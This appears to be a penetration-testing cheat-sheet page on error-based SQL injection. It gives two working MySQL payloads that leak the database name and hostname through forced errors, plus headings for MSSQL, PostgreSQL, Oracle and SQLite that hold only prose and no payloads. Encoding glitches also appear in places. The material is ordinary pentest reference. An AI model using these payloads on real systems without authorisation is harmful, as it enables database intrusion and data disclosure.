๐๏ธExtract DB Name Using Errors
These advanced error-based SQL injection techniques, you can extract crucial information such as the database name and hostname, which can further aid in your exploitation efforts.
MySQL
Extracting Database Name
' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT database()), 0x3a, FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y) --Extracting Hostname
Use error-based injection to extract the hostname.
' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT @@hostname), 0x3a, FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y) ------------------------------------------------------------------
MSSQL
Extracting Database Name
Use error-based injection to extract the current database name.
Extracting Hostname
Use error-based injection to extract the server hostname.
----------------------------------------------------------------
PostgreSQL
Extracting Database Name
Use error-based injection to extract the current database name.
Extracting Hostname
PostgreSQL does not directly provide a function for hostname, but you can use other metadata queries or built-in extensions like inet_server_addr.
inet_server_addr.----------------------------------------------------------------
Oracle
Extracting Database Name
Use error-based injection to extract the current database name.
Extracting Hostname
Use error-based injection to extract the hostname.
----------------------------------------------------------------
SQLite
Extracting Database Name
SQLite uses a single database per file, but you can force errors to reveal database-related information.
Extracting Hostname
SQLite does not inherently have a hostname since itโs a file-based database. However, you can infer file paths which might give clues.
----------------------------------------------------------------
Last updated